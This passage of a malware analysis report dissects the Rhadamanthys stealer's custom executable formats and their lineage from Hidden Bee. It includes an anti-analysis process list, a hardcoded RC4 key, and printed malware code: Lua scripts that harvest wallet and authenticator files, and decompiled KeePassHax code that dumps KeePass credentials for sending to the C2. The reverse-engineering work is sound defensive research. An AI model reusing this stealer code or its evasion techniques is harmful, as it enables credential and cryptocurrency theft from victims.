We can see it reproduced in the following simplified PoC, which involves MS Detours as a hooking library and LibPEConv as a manual loader: https://gist.github.com/hasherezade/3a9417377cacd893c580bdffb85292c1. We can test it by deploying a manually loaded executable that throws exceptions: https://github.com/hasherezade/libpeconv/blob/master/tests/test_case7/main.cpp. The result shows that, indeed, the exception handlers are properly executed:

Without the applied hook, any exception thrown from the manually loaded module causes a crash.

The NS format

Way more interesting is the second format, starting with the magic “NS”. As we prove later, this is the basis of the formats that are now used for the Rhadamanthys components.

The visualization is shown below:

As we can see, the DOS header has been completely removed from the format. The information that is usually stored in the PE’s File Header and Optional Header was limited to the minimum and combined in a new structure. However, we still encounter some artifacts that resemble PE. Just after the NS identifier, comes the Machine ID, which has exactly the same value as the one from the PE’s File Header and is used to distinguish whether the module is 32 or 64-bit.

Next follows the minimized Data Directory, which contains only 6 records instead of the typical 16. The records are identical to the ones in the PE format: each contains RVA and Size, given as DWORDs. Directly after the Data Directory, there is a list of sections (the number of which is specified in the header). The records defining each section are a minimalist version of the ones from the PE format and contain only 4 fields: RVA, size, raw address, and characteristics.

While the records of the Data Directory are mostly unchanged, the way some of the structures are loaded and defined has been modified. The Import Table structure is slightly smaller compared to the original one from the PE format. It is implemented as a list of the following records:

The reconstructed header of the NS format:

const WORD NS_MAGIC = 0x534e;

namespace ns_exe {

    const size_t NS_DATA_DIR_COUNT = 6;

    enum data_dir_id {
        NS_IMPORTS = 1,
        NS_RELOCATIONS = 3,
        NS_IAT = 4
    };

    typedef struct {
        DWORD dir_va;
        DWORD dir_size;
    } t_NS_data_dir;

    typedef struct {
        DWORD va;
        DWORD size;
        DWORD raw_addr;
        DWORD characteristics;
    } t_NS_section;

    typedef struct {
        DWORD dll_name_rva;
        DWORD original_first_thunk;
        DWORD first_thunk;
        DWORD unknown;
    } t_NS_import;

    typedef struct NS_format {
        WORD magic; // 0x534e
        WORD machine_id;
        WORD sections_count;
        WORD hdr_size;
        DWORD entry_point;
        DWORD module_size;
        DWORD image_base;
        DWORD image_base_high;
        DWORD saved;
        DWORD unknown1;
        t_NS_data_dir data_dir[NS_DATA_DIR_COUNT];
        t_NS_section sections[SECTIONS_COUNT];
    } t_NS_format;

};

The complete converter of the NS format is available at:

• https://github.com/hasherezade/hidden_bee_tools/blob/master/bee_lvl2_converter/ns_exe.cpp

Kernel mode NS modules

While the custom executable formats are, in general, uncommon, even more unusual was to see them used for kernel mode modules.

The function presented below shows a fragment of the loader used by Hidden Bee (module kloader.bin), whose role is to load drivers in the custom format (NS):

To date, kernel mode modules haven’t been observed in Rhadamanthys. However, they show the authors’ diverse skills and how much they are invested in innovating various new formats.

Rhadamanthys formats: RS and HS

Custom formats RS and HS have been observed in Rhadamanthys version 0.4.1, and below.

Looking at their structure, we can see an uncanny similarity to the previously mentioned NS format, to the point that modifying the original Hidden Bee converter to support them was a matter of a short time. In this part, we will present their internals.

Unpacking the custom format

Reaching the components in the custom formats may not be straightforward and requires some unpacking skills. The initial Rhadamanthys module is a PE file distributed to victims during malicious campaigns. It is usually wrapped in some packer/crypter for additional protection. As Rhadamanthys is sold publicly and used by various distributors, the choice of which outer crypter is used may vary; hence, we will skip the related part. In many cases, we can quickly unpack it by mal_unpack/PEsieve.

Assuming that we got rid of the third-party layer, we are at the first Rhadamanthys executable (referred to as Stage 1). Tracing the application with Tiny Tracer quickly allows to find the offsets that should draw our attention. Fragment of the tracelog:

31f8;kernel32.HeapFree
326e;kernel32.HeapFree
3277;kernel32.HeapDestroy
**1003;called: ?? [694000+730]**
> 694000+9ff;kernel32.LocalAlloc
> 694000+7c9;kernel32.LocalAlloc
> 694000+96f;kernel32.LocalFree
> 694000+a44;kernel32.VirtualAlloc
> 694000+a88;kernel32.LocalFree
**> 694000+a95;called: ?? [ca96000+1d4]**
> ca96000+1de;called: ?? [ca95000+cae]
> ca95000+cff;called: ?? [ca96000+1e3]
> ca96000+1e8;called: ?? [ca95000+e73]
> ca95000+ecf;called: ?? [ca96000+1ed]

Reading the above snippet, we can pinpoint two places where the execution got redirected to the next unnamed module (possibly shellcode). First, the redirection from the main module happens at RVA 0x1003. Then, looking at the called functions (i.e. VirtualAlloc), we can assume there was another module unpacked by the first shellcode. The execution is redirected at shellcode’s offset 0xA95.

If we set a breakpoint at the first offset, we can follow those transitions under the debugger.

The revealed shellcode is responsible for unpacking, remapping, and running the next stage, which is in a custom executable format. The module is shipped in a compressed form:

The shellcode decompresses it first, and the interesting structure gets revealed:

As we can see, the unpacked stage is the first module in a custom executable format, RS.

The shellcode remaps the RS module from raw to virtual format into the newly allocated, executable memory area. For this purpose, it uses the information about the sections that is stored in the custom RS header.

Next, the execution is redirected to the Entry Point of the new module. Note that the new component still depends on the data passed from Stage 1. Its start function expects two arguments. The first one is the module’s own base. The second is a data structure, with two pointers leading to important blocks of data.

// passed structure with pointers to two data blocks
struct mod_data {
  _BYTE *compressed_data;
  _BYTE *url_config;
};

One of the addresses points to the compressed data block. This is a package in a proprietary format and contains other modules to be loaded. It is an equivalent of the virtual filesystems implemented in Hidden Bee (more details later in the report).

The next component is a config, which contains the URL of the C2 that will be queried to download the next stage. The config is RC4 encrypted, using a 32-byte long, hardcoded key. For the analyzed cases, the key was:

52 AB DF 06 B6 B1 3A C0 DA 2D 22 DC 6C D2 BE 6C 20 17 69 E0 12 B5 E6 EC 0E AB 4C 14 73 4A ED 51

The decrypted config for the currently analyzed version has the following structure:

struct config_data {
  DWORD rhy_magic; //!RHY
  DWORD flags;
  char next_key[16];
  char c2_url[1];
}

This configuration is embedded into the Rhadamanthys Stage 1 executable by the builder, which is a part of the toolkit sold to the distributors.

The RS format

Following the steps described above, we were able to dump a complete executable in the RS format in its raw version. Let’s now analyze the structure and the way it is loaded so that we can convert it back to the PE.

The header of the RS format has many similarities with the NS format, known from Hidden Bee. The reconstructed structures are presented below:

namespace rs_exe {

const size_t RS_DATA_DIR_COUNT = 3;

    enum data_dir_id {
        RS_IMPORTS = 0,
        RS_EXCEPTIONS,
        RS_RELOCATIONS = 2
    };

    typedef struct {
        DWORD dir_size;
        DWORD dir_va;
    } t_RS_data_dir;

    typedef struct {
        DWORD raw_addr;
        DWORD va;
        DWORD size;
    } t_RS_section;

    typedef struct {
        DWORD dll_name_rva;
        DWORD first_thunk;
        DWORD original_first_thunk;
    } t_RS_import;

    typedef struct {
        WORD magic; // 0x5352
        WORD machine_id;
        WORD sections_count;
        WORD hdr_size;
        DWORD entry_point;
        DWORD module_size;
        t_RS_data_dir data_dir[RS_DATA_DIR_COUNT];
        t_RS_section sections[SECTIONS_COUNT];
    } t_RS_format;

};

As we could see under the debugger, the first steps required for loading the format are taken by the intermediary shellcode. It remaps the module from the raw format (which is more condensed) into the virtual one (ready to be executed). The reconstruction of the function responsible:

Analyzing the above function, we can see that the shellcode decompresses the passed block of data, revealing the RS module in its raw form. The RS header is then parsed to obtain some needed information. First, a memory for the virtual image is allocated. The sections are then copied in a loop to that memory. This mechanism is very similar to the equivalent stage of PE loading. After the mapping is done, the Entry Point from the header is fetched, and the execution is passed there. This is where the intermediary shellcode’s role ends. The module itself proceeds with the remaining steps required for its own loading. Let’s have a look at the start function of the RS module:

The first few functions are exactly what we can expect in case of module loading, but they are implemented following the custom format. After the loading is finished, the module erases its own header in order to make it more difficult to dump and reconstruct it from memory.

Looking at the overall structure of the start function, we can see some similarities to the analogous functions of the Hidden Bee modules.

The first function that is called at the start is to apply relocations – adjusting each absolute address in the module to the actual load base. The format used for relocation blocks doesn’t differ from the PE standard (it is the only artifact that was left unchanged for now), so we omit the detailed description.

The next important function is for resolving all needed imports. The overview:

As we know, functions imported from external libraries can be fetched in two ways: by names or by ordinals. Names stored in a binary can give a lot of hints about the module’s functionality, so malware authors often try to hide them. A popular technique to achieve this goal is by using hashes/checksums of the names. This is also implemented in the current format. In the case of functions that are expected to be loaded by name, the original string is erased and replaced by its checksum (that is, a DWORD stored at the corresponding offset of PIMAGE_IMPORT_BY_NAME). Upon loading, the actual name is searched by the checksum and then used as an argument to the standard WinAPI function GetProcAddress.

Next, we can see the implementation of custom exception handling. The solution used is identical to the one from the previously described NE format of Hidden Bee (for more details, see “Handling exceptions from a custom module”).

An address of a call to ZwQueryInformationProcess was replaced, and now it points to the virtual offset 0x595e in the Rhadamanthys module.

The function where the redirection leads is identical to what we saw in the case of Hidden Bee:

After all the steps related to module loading, the main function, responsible for the core functionality of the module, is called. The details of the functionality are described in a later chapter.

The complete converter of the RS format is available here:

• https://github.com/hasherezade/hidden_bee_tools/blob/master/bee_lvl2_converter/rs_exe.cpp

Demo

Converting the RS module (raw format) dumped from memory into PE:

The input RS file: f9051752a96a6ffaa00760382900f643

The resulting output is a PE file, which can be further analyzed using typical tools, such as IDA.

The HS format

A similar, yet not identical, format is used for the modules that are unpacked by the Stage 2 main component (that is in the RS format described above). The HS format may also be used for the modules from the package downloaded from the C2.

Example – Stage 2 unpacks the embedded HS module: “unhook.bin”

The header of the HS format:

const WORD HS_MAGIC = 0x5348;

namespace hs_exe {

const size_t HS_DATA_DIR_COUNT = 3;

    enum data_dir_id {
        HS_IMPORTS = 0,
        HS_EXCEPTIONS,
        HS_RELOCATIONS = 2
    };

    typedef struct {
        DWORD dir_va;
        DWORD dir_size;
    } t_HS_data_dir;

    typedef struct {
        DWORD va;
        DWORD size;
        DWORD raw_addr;
    } t_HS_section;

    typedef struct {
        DWORD dll_name_rva;
        DWORD original_first_thunk;
        DWORD first_thunk;
    } t_HS_import;

    typedef struct {
        WORD magic; // 0x5352
        WORD machine_id;
        WORD sections_count;
        WORD hdr_size;
        DWORD entry_point;
        DWORD module_size;
        DWORD unk1;
        DWORD module_base_high;
        DWORD module_base_low;
        DWORD unk2;
        t_HS_data_dir data_dir[HS_DATA_DIR_COUNT];
        t_HS_section sections[SECTIONS_COUNT];
    } t_HS_format;

};

Some of the fields of the header were rearranged, yet this format is not that different from the previous one. One subtle difference is that this module allows for storing the original Module Base; in the RS format equivalent field does not exist, and 0 is used as a default base.

In some aspects, the HS format is simpler than the former one. For example, the import table is implemented exactly like in the Hidden Bee’s NE format, which resembles more of the one typical for PE. In the RS format, the names of imported functions are erased and loaded by hashes. Here, the original strings are preserved.

The complete converter of the HS format is available here:

• https://github.com/hasherezade/hidden_bee_tools/blob/master/bee_lvl2_converter/hs_exe.cpp

Rhadamanthys’ latest format: XS

Recently observed samples of Rhadamanthys (version 0.4.5 and higher) bring another update to the custom formats. The RS format, as well as the HS, are replaced by a reworked version with an XS magic. This new format has two variants.

The first set of components that makes up Stage 2 of the malware (shipped in the initial binary) comes in a format that we denote as XS1. As we learn later, there is another variant with the same magic but with a slightly modified header. It is used for the Stage 3, which is downloaded from the C2: containing the main stealer component and its submodules. The latter format we denote as XS2. Let’s review them one by one.

Unpacking the custom format

Analogously to the previous case, let’s start with an overview of how to obtain the first custom module. We can jump right into the interesting offsets by tracing the Rhadamanthys Stage 1 PE with Tiny Tracer. The resulting tracelog is available here.

This time, before the vital part is unpacked, the main executable examines its environment by enumerating running processes and comparing them against the list of known analysis tools:

procexp.exe
procexp64.exe
tcpview.exe
tcpview64.exe
Procmon.exe
Procmon64.exe
vmmap.exe
vmmap64.exe
portmon.exe
processlasso.exe
Wireshark.exe
Fiddler Everywhere.exe
Fiddler.exe
ida.exe
ida64.exe
ImmunityDebugger.exe
WinDump.exe
x64dbg.exe
x32dbg.exe
OllyDbg.exe
ProcessHacker.exe
idaq64.exe
autoruns.exe
dumpcap.exe
de4dot.exe
hookexplorer.exe
ilspy.exe
lordpe.exe
dnspy.exe
petools.exe
autorunsc.exe
resourcehacker.exe
filemon.exe
regmon.exe
windanr.exe

If any process from the list is detected, the sample exits.

Otherwise, it proceeds by unpacking the next stage shellcode, which is very similar to the one used by the previous version. Next, it redirects the execution there. As we can see from the TinyTracer tracelog, the first shellcode is called at RVA 0x2459:

**2459;called: ?? [11790000+0]**
> 11790000+2fe;kernel32.LocalAlloc
> 11790000+ba;kernel32.LocalAlloc
> 11790000+260;kernel32.LocalFree
> 11790000+34c;kernel32.VirtualAlloc
> 11790000+3a4;kernel32.VirtualProtect
> 11790000+3bb;kernel32.LocalFree
**> 11790000+52;called: ?? [f991000+88]**
> f991000+80;called: ?? [f995000+d4d]
> f995000+d58;called: ?? [f998000+0]
> f998000+ca;called: ?? [f995000+d5d]

Further on, there is a transition to a region allocated from within the first shellcode. Again, we can observe those transitions under the debugger.

First, setting the breakpoint at RVA 0x2459 in the main sample, we can find the shellcode being called:

The dumped memory region: 806821eb9bb441addc2186d6156c57bf

Not much about the functionality of this shellcode has changed compared to the previous version. Once again, it is responsible for unpacking the next stage and redirecting the execution there. We can dump the raw XS module right after it is decompressed:

We’ll examine the dumped module later.

Example of the dumped XS module: 9f0bb1689df57c3c25d3d488bf70a1fa

The XS format: Variant 1

As mentioned earlier, there are two slightly different variants of the XS format. Let’s start with the first one used for the initial set of components, including the module we unpacked in the section above.

The reconstructed structure of the header:

struct xs_section
{
  _DWORD rva;
  _DWORD raw;
  _DWORD size;
  _DWORD flags;
};

struct xs1_data_dir
{
  _DWORD size;
  _DWORD rva;
};

struct xs1_format
{
  _WORD magic;
  _WORD nt_magic;
  _WORD sections_count;
  _WORD imp_key;
  _WORD header_size;
  _WORD unk_3;
  _DWORD module_size;
  _DWORD entry_point;
  xs1_data_dir imports;
  xs1_data_dir exceptions;
  xs1_data_dir relocs;
  xs_section sections[SECTIONS_COUNT];
};

struct xs1_import
{
  _DWORD dll_name_rva;
  _DWORD first_thunk;
  _DWORD original_first_thunk;
  _BYTE obf_dll_len[4];
};

As before, the module is decompressed and then mapped by the intermediary shellcode:

After remapping the XS module from the raw format to the virtual one, it redirects the execution to the module’s Entry Point.

The overview of the start function of the XS module is shown below.

Compared to the previously used RS format, there are several changes besides the simple rearrangements of the fields and the addition of some new fields.

The first modification concerns how the format is recognized as either 32-bit or 64-bit. In the PE format, there are two different fields that we can use to distinguish between them. The first one is the “Machine” field in the FileHeader. The other is “Magic” in the Optional Header. The copy of the “Machine” field was used previously in the Hidden Bee and Rhadamanthys custom formats. This time the author replaced it with the alternative and used the “Optional Header → Magic”.

But there are other, more meaningful changes further on. First of all, a new obfuscation is applied. The names of the DLLs are no longer in plaintext but processed by a simple algorithm. The key is customizable and stored in the header. The decoding function is called by a wrapper function of LoadLibaryA, so the deobfuscation takes place just before the needed DLL is about to be loaded:

The decoding of the name is done by a custom, XOR-based algorithm:

The imported functions are still loaded by their checksums (just like in the RS format), but the checksum algorithm has changed. This is the implementation from the RS module:

namespace rs_exe {
    DWORD calc_checksum(BYTE* a1)
    {
        BYTE* ptr; 
        unsigned int result;
        char i;
        int v4;
        int v5;

        ptr = a1;
        result = 0;
        for (i = *a1; i; ++ptr)
        {
            v4 = (result >> 13) | (result << 19);
            v5 = i;
            i = ptr[1];
            result = v4 + v5;
        }
        return result;
    }
};

In the XS format, it was replaced with a different one:

namespace xs_exe {
int calc_checksum(BYTE* name_ptr, int imp_key)
    {
        while (*name_ptr)
        {
            int val = (unsigned __int8)*name_ptr++ ^ (16777619 * imp_key);
            imp_key = val;
        }
        return imp_key;
    }
};

The new algorithm was also enhanced by the introduction of an additional key that can be supplied by the caller.

Once again, the checksums are stored in places of the thunks, but their position got slightly modified. In the RS format, the checksums were stored at PIMAGE_IMPORT_BY_NAME. Now they are stored at PIMAGE_IMPORT_BY_NAME → Name, so it is shifted by one WORD.

As for the key, it uses imp_key stored in the XS header, and it is the same as for decoding the DLL names. As the DLL name is now obfuscated, another field was added to store its original length. The author also decided to obfuscate this value with the help of another simple algorithm.

The full imports loading function of the XS format looks like this:

The other change introduced in the new format is a custom relocations table. In the previous format, as well as in the formats used by the Hidden Bee, relocations were the only component identical to the one used by the PE. This time, the author decided to change it and created his own modified way of relocating the module.

The stored relocations table looks very different than the one used by PE. Reconstruction of the structures used:

struct xs_relocs_block
{
        DWORD page_rva;
        DWORD entries_count;
};

struct xs_relocs // the main structure, pointed by the data directory RVA
{
        DWORD count;
        xs_relocs_block blocks[1];
};

// after the list of reloc blocks, there are entries in the following format:
struct xs_reloc_entry {
        BYTE field1_hi;
        BYTE mid;
        BYTE field2_low;
};

Offsets of the fields to be relocated are stored in pairs and compressed into 3 bytes.

First offset from the pair:

Second offset from the pair:

The RVA of the field to be relocated is calculated by page_rva + offset. There is no default base, so the new module base is simply added to the field content.

The complete converter of the XS format is available here:

• https://github.com/hasherezade/hidden_bee_tools/blob/master/bee_lvl2_converter/xs_exe.cpp

The XS format: Variant 2

When we reach the Stage 3 of the malware and follow the unpacked components that are downloaded from the C2, we once again see the familiar XS header is revealed in memory:

Although at first glance, we may think that we are dealing with an identical format, when we take a closer look, we find that the previous converter no longer works. The format has undergone subtle yet significant modifications. The first thing that we may notice is that information of whether the module is 32-bit or 64-bit is no longer stored in the header. The first field after the XS magic now stores the number of sections. There are also other fields that have been swapped or removed compared to the first XS variant. The reconstruction of the header:

struct xs_section
{
  _DWORD rva;
  _DWORD raw;
  _DWORD size;
  _DWORD flags; //a section can be skipped if the flag is not set
};

struct xs2_data_dir
{
  _DWORD rva;
  _DWORD size;
};

struct xs2_format
{
  _WORD magic;
  _WORD sections_count;
  _WORD header_size;
  _WORD imp_key;
  _DWORD module_size;
  _DWORD entry_point;
  _DWORD entry_point_alt;
  xs2_data_dir imports;
  xs2_data_dir exceptions;
  xs2_data_dir relocs;
  xs_section sections[SECTIONS_COUNT];
};

struct xs2_import
{
  _DWORD dll_name_rva;
  _DWORD first_thunk;
  _DWORD original_first_thunk;
  _BYTE obf_dll_len[2];
};

The Data Directory fields were swapped. In addition, in the import record, the obfuscated length of the DLL name is now stored as 2 bytes instead of 4 bytes. Some other fields of the XS main header also have been relocated or removed.

Another detail that has changed is the way sections are mapped from the raw format to virtual. Now, some of the sections can be excluded from loading based on the flag in the section’s header.

This is the trick that the author uses in order to disrupt the dumping of the module from memory. The vital sections are separated by inaccessible regions that make reading the continuous memory area difficult.

Aside from these few changes, both XS variants are still very similar. They contain the same import resolution, as well as the same way of applying relocations.

Similarities across the formats

In addition to some fields being swapped or others removed, we can see a large overlap of the discussed formats that doesn’t just stem from their common predecessor, PE.

As we can see, the initial part of the header is consistent between Hidden Bee’s NS and Rhadamanthys’ RS and HS formats:

    typedef struct {
        WORD magic;
        WORD machine_id;
        WORD sections_count;
        WORD hdr_size;
        DWORD entry_point;
        DWORD module_size;
//...
}

Next, a minimized version of the Data Directory is used. It contains only a few records – usually Imports and Relocations (but it may also contain an Exception Table).

After the Data Directory, the list of sections follows, which was further minimized by removing the Characteristics field.

One of the improvements that was introduced in the RS format is the obfuscation of the import names. The original strings are now replaced by checksums, stored in the place of PIMAGE_IMPORT_BY_NAME.

The new XS format is clearly the next stage of evolution. The function names are also loaded by checksums but with an additional obfuscation that necessitates using the customizable key stored in the header. In addition, the library names are now stored in obfuscated form.

Overall, it is visible that the custom executable formats are subject to continuous evolution. The newly introduced changes are meant to obfuscate it further and increasingly diverge from the original PE format.

The HS format of Rhadamanthys is the closest to the NS format from Hidden Bee. Below, we can see a comparison of the headers:

The benefits of understanding custom formats

The main benefit of understanding the custom formats is that it enables us to reconstruct them as PE files. This makes them easier to analyze, as they can be parsed by standard analysis tools.

In this section, we review the converted results (PEs) that we obtained and provide an overview of their functionality. We also highlight how the equivalent components have changed across the different versions.

Let’s start by comparing the converted Stage 2 modules of the RS and XS1 formats.

The 2nd stage loader: RS converted

After the loading of this module is completed, the execution is redirected to the main function.

As mentioned earlier (Figure 15), the module depends on data that is passed from Stage 1, namely the compressed package with other components and the encrypted configuration, which is protected by the RC4 algorithm.

The RC4-encrypted block is decrypted at the beginning of the function using the hardcoded key.

If the decryption of the configuration is successful, the output block should start with the magic !RHY. After the verification, the sample makes sure that there isn’t another instance running by trying to lock the mutex. After both checks are passed, the config and the compressed package are passed to the next function, where the main functionality of the modules is deployed.

As it turns out, the current module incorporates multiple different features, such as:

• Evasion
• Loading of the further components from the supplied package
• Connecting to the C2 and downloading the next stage

The URL used to contact the C2 is obtained from the config. It is used to fetch Stage 3, which will be loaded either into the current process (if run on a 32-bit environment) or into another 64-bit process.

First, the deobfuscated URL is stored in another structure that is passed to a function responsible for the HTTP connection:

Before the connection is attempted, the malware calls a variety of different environment checks in order to evade sandboxes and other supervised environments.

Which evasion checks are going to be enabled depends on the flags that were passed from the configuration block (the !RHY format).

The code performing the checks is mostly copied from an open-source utility, Al-Khaser.

The connection with the C2 is established only if the checks pass.

The function denoted as parse_response is responsible for decoding the next stage that was downloaded from the C2 and hidden in a media file (JPG). In the current case, the expected output is a package in a custom !Rex format, which is a virtual filesystem that contains additional components. If the payload is fetched, decoded, and passes validation, the malware loads the retrieved components. The way in which it proceeds depends if the main malware executable (that is 32-bit) is running on a 64-bit or a 32-bit system.

On a 32-bit system, the next stage is loaded directly into the current process. By following the related part of the code, we can conclude that the next stage component is expected to be a shellcode. First, a small data structure is prepared and filled by all the elements that the shellcode needs to run: a small custom IAT containing the necessary functions, as well as data, such as the RC4 key.

If the malware is executed in a 64-bit environment, it will first redeploy itself in a 64-bit mode. To do so, it needs additional components fetched from the compressed block.

We can also see that the malware creates a named mapped section that will be used for sharing data between the components. The name of the section is first randomly generated. Then, together with some other data, it is filled into the next shellcode (prepare.bin) fetched from the initial package. This model of using named mapped sections to share data between different components was also used extensively by Hidden Bee.

Looking at the above code, we can see that the compressed data block is first uncompressed. At this point, the components are still loaded from the first package passed from the Stage 1 binary (rather than from the downloaded one). Elements stored inside the package are fetched by their names. Two elements are referenced: prepare.bin and dfdll.dll.

This DLL is further dropped into the %APPDATA% directory, disguised as a DLL related to NSIS installers.

Overall, the main purpose of this stage is to download and deploy the final malicious components, which are shipped in a custom package.

The 2nd stage loader: XS1 converted

Let’s have a look at the next version of the analogous loader, this time converted from the XS binary.

Just like in the case of the RS format, the start function of the XS module completes self-loading and then proceeds to the main function.

Inside the main_func, the passed configuration gets decrypted and verified.

The way in which the config is deobfuscated slightly changed compared to the RS module. Now the data is passed as Base64 encoded with a custom charset (ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcdefghijklmnopqrstuvwxyz*$). After being decoded, it is RC4 decrypted (with the same key as used by the previous version). Then, another layer of deobfuscation follows: the result is processed with an XOR-based algorithm. While the deobfuscation process is more complicated, the result has an analogous format to what we observed in the RS versions. Example:

If the config was successfully decrypted, the malware proceeds with its initialization. First, it verifies if it was already run by checking the value sn under its installation key, impersonating SibCode: HKEY_CURRENT_USER: Software\SibCode. The stored value should contain the timestamp of the malware’s last run. If the last run time was too recent (below the threshold), the malware won’t proceed.

It further checks if the instance is already running by verifying the mutex (generated in a format MSCTF.Asm.{%08lx-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x} just as in the previous version of the loader.).

Depending on the Windows version, it may try to rerun itself with elevated privileges, using runas.

Otherwise, it proceeds to the next function, denoted as decrypt_and_load_modules. This function is mainly used for loading and deploying other components from the package that was passed from the previous layer. The snippet is given below. Note that in this case as well, the author added additional obfuscation: a padding of random bytes that is filled before the actual module start.

Compared to Stage 2 in the earlier analyzed version, the biggest change is the increased modularity: now the main module of the stage is just a loader, and each part of the functionality is separated into a distinct unit. Initially, most of the above functionalities were combined in a single Stage 2 component. This shift towards modularity is a gradual one across consecutive versions.

An overview of the modules is given below.

It is clear that the author is progressing toward increased customization. Even the list of User Agents is now configurable and stored in a separate file (ua.txt). It is decoded from the package and then passed to the further module, netclient.bin, which establishes the connection to the C2. There are also more options to deliver the final stage. In the previous version, it was shipped as a JPG, and now it can also be delivered as a WAV.

The functions responsible for decoding both forms of the payloads are analogous.

The fragment of JPG decoding – after the payload decryption, the SHA1 hash stored in the header is compared with the hash that is calculated from the content:

The fragment of WAV decoding – note that for verification, a different hash is used: SHA256 instead of SHA1:

After decoding the downloaded file, we obtain another package containing further modules.

An analogous way of delivering further components was used by Hidden Bee (details described in the Malwarebytes article: [9]).

Since the media files are used for hiding the payload, this way of delivery is sometimes called steganographic. However, note that it is not a steganography in the real meaning of this word. The data is stored not within, but after the actual content of the JPG or WAV file, in encrypted form.

The stealer component (HS/XS2 format)

The main component of the malware is downloaded from the C2 and revealed as the third stage. Depending on the version, it was observed in HS or XS2 custom formats. The component is responsible for the core operations of the malware, related to stealing information. During its execution, it further loads additional modules from the same package, some of which are executables in the same custom format.

Let’s have a quick look at selected features, mainly focusing on the HS variant.

The building blocks of the module’s start function are similar to the cases described earlier: finishing the module’s loading process and then passing the execution to the main function. However, we can see some new functions were added at this initial stage. For example, there is a function installing a patch responsible for AMSI bypass. This bypass is needed due to the fact that the current module is going to load .NET modules and deploy malicious PowerShell scripts.

The main function of the module contains different execution paths, which are selected depending on the command ID that was passed as one of the arguments. That means the layer above decides which actions are deployed. Many of the commands are responsible for loading/unloading certain modules and injection into other processes. Other commands are involved in the immediate deployment of malicious capabilities.

Most of the additional modules are fetched by hardcoded paths that we can find in the binary. Example:

/bin/runtime.exe
/extension/%08x.lua
/bin/i386/stub.dll
/bin/KeePassHax.dll
/bin/i386/stubmod.bin
/bin/i386/coredll.bin
/bin/i386/stubexec.bin
/bin/amd64/preload.bin
/bin/amd64/coredll.bin
/bin/amd64/stub.dll

The path format is analogous to what we observed in Hidden Bee. We provide additional explanations in a later chapter.

Just like Hidden Bee, Rhadamanthys can run LUA scripts. In the older version of the module (HS variant), the scripts were referenced by paths with the .lua extension:

In the latest (XS) version, the extension has been replaced with a custom one, .xs:

However, looking inside the unpacked content, we can see that the scripts didn’t change that much and are still written in LUA.

The malware supports up to 100 scripts, but only 60 were used in the analyzed cases. The scripts implement a variety of targeted stealers.

For example, some of them are used for stealing specific cryptocurrency wallets:

local file_count = 0
if not framework.flag_exist("W") then
    return
end
local filenames = {
    framework.parse_path([[%AppData%\DashCore\wallets\wallet.dat]]),
    framework.parse_path([[%LOCALAppData%\DashCore\wallets\wallet.dat]])
}
for _, filename in ipairs(filenames) do
    if filename ~= nil and framework.file_exist(filename) then
        if file_count > 0 then
            break
        end
        framework.add_file("DashCore/wallet.dat", filename)
        file_count = file_count + 1
    end
end
if file_count > 0 then
    framework.set_commit("!CP:DashCore")
end

Or account profiles:

local files = {}
local file_count = 0
if not framework.flag_exist("2") then
    return
end
local filename = framework.parse_path([[%AppData%\WinAuth\winauth.xml]])
if path ~= nil and framework.path_exist(path) then
    framework.add_file("winauth.xml", filename)
    framework.set_commit("$[2]WinAuth")
end

The set of additional modules contain also some .NET executables (written in .NET 4.6.1). For example, the module named runtime.exe that is responsible for running supplied Powershell scripts:

The KeePassHax.dll is another .NET executable, responsible for dumping KeePass credentials and sending them to the C2. Fragment of the code:

// Token: 0x06000006 RID: 6 RVA: 0x00002150 File Offset: 0x00000350
        private static void KcpDump()
        {
            Dictionary<string, byte[]> dictionary = new Dictionary<string, byte[]>();
            object fieldInstance = Assembly.GetEntryAssembly().EntryPoint.DeclaringType.GetFieldStatic("m_formMain").GetFieldInstance("m_docMgr").GetFieldInstance("m_dsActive").GetFieldInstance("m_pwDb");
            object fieldInstance2 = fieldInstance.GetFieldInstance("m_pwUserKey");
            string s = fieldInstance.GetFieldInstance("m_ioSource").GetFieldInstance("m_strUrl").ToString();
            IEnumerable enumerable = (IList)fieldInstance2.GetFieldInstance("m_vUserKeys");
            dictionary.Add("U", Encoding.UTF8.GetBytes(s));
            foreach (object obj in enumerable)
            {
                string name = obj.GetType().Name;
                if (!(name == "KcpPassword"))
                {
                    if (!(name == "KcpKeyFile"))
                    {
                        if (name == "KcpUserAccount")
                        {
                            byte[] value = (byte[])obj.GetFieldInstance("m_pbKeyData").RunMethodInstance("ReadData", Array.Empty<object>());
                            dictionary.Add("A", value);
                        }
                    }
                    else
                    {
                        object fieldInstance3 = obj.GetFieldInstance("m_strPath");
                        dictionary.Add("K", Encoding.UTF8.GetBytes(fieldInstance3.ToString()));
                    }
                }
                else
                {
                    string s2 = (string)obj.GetFieldInstance("m_psPassword").RunMethodInstance("ReadString", Array.Empty<object>());
                    dictionary.Add("P", Encoding.UTF8.GetBytes(s2));
                }
            }
            Program.KcpDumpSendData(dictionary);
        }

Note – Covering the full functionality of this Stage is out of the scope of this article. Some of it was described in the previous Check Point Rhadamanthys publication [1] and may be continued as the next part of this series.

Other similarities with Hidden Bee

The custom formats that we described here have clear similarities to Hidden Bee. But that is not the only thing these two malware families have in common. We can clearly see that the design, and even fragments of the code, are reused.

Data sharing via named mapping

Hidden Bee, as well as Rhadamanthys, consists of multiple modules that can run in different processes. Sometimes, they need to share data from one process to another. For this purpose, the author decided to use a shared memory area that is accessed by different processes via named mapping.

Example from Hidden Bee:

We can see a similar use of named mapping in Rhadamanthys. The malware may need to start a new process where it can inject its module. However, some data from the current process must be forwarded there. To do so, a named mapping is created. The data is entered and is retrieved from within the next process:

Those shared memory pages contain a variety of content such as configuration, encryption keys, checksums of the functions that are loaded by additional modules, etc. It is also a space where the virtual filesystem can be mounted, that is, the package in a custom format with various files, including executable modules. The modules are retrieved by their names or paths (depending on the specific format’s characteristics).

Retrieving components from virtual filesystems

In articles from 2019 about Hidden Bee [8] [9], a glimpse into the virtual filesystems and the embedded components was given. We can find there familiar-looking paths: /bin/amd64/preload, /bin/amd4/coredll.bin, etc.

Interestingly, the same paths occur in Rhadamanthys in an unchanged form. Just like in Hidden Bee, they are used to reference the components from the virtual file system:

Hidden Bee, as well as Rhadamanthys, uses diverse formats for the virtual filesystems. As it was noted during the Hidden Bee analysis [8], the author based this part on ROMFS. However, over time, the structure diverged significantly from its predecessor and is fully custom in its current form. There are, however, some artifacts that lead us to conclude that the file systems used by Rhadamanthys are simply the next step in the evolution of the ones used in Hidden Bee. The most obvious similarity is the magic: !Rex:

